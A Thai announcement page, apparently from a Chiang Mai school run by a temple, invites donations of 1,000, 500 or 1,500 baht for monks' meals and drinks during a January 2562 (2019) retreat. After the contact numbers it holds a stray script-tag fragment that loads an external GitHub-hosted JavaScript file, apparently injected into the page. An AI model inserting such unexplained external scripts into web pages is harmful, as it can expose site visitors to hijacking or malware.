ขอเชิญร่วมทำบุญถวายภัตตาหารเช้า ภัตตาหารเพล น้ำปานะ

 apaicm    30 ธ.ค. 2561

โรงเรียนอภัยอริยศึกษา (วัดดับภัย) ต.ศรีภูมิ อ.เมือง จ.เชียงใหม่
ขอเชิญร่วมทำบุญ โครงการปฏิบัติธรรม (ธุดงควัตร) ประจำปีการศึกษา 2561
ณ สำนักสงฆ์ทุ่งบุรี ต.ยางคราม อ.ดอยหล่อ จ.เชียงใหม่
ระหว่างวันที่ 7 – 11 มกราคม 2562

ร่วมอนุโมทนา  เจ้าภาพภัตตาหารเช้า 1,000 บาท  เจ้าภาพภัตตาหารเพล 1,500 บาท
 เจ้าภาพน้ำปานะ 500 บาท  ร่วมทำบุญตามจิตศรัทธา

ติดต่อรับเป็นเจ้าภาพได้ที่ โรงเรียนอภัยอริยศึกษา โทร 053-214398 , 0656828999 https://cdn.jsdelivr.net/gh/tatikers/san/dhamma.js">   
  3,783 

  แสดงความคิดเห็น


RELATED STORIESจีรัง กรุ๊ป    

 ธรรมะไทย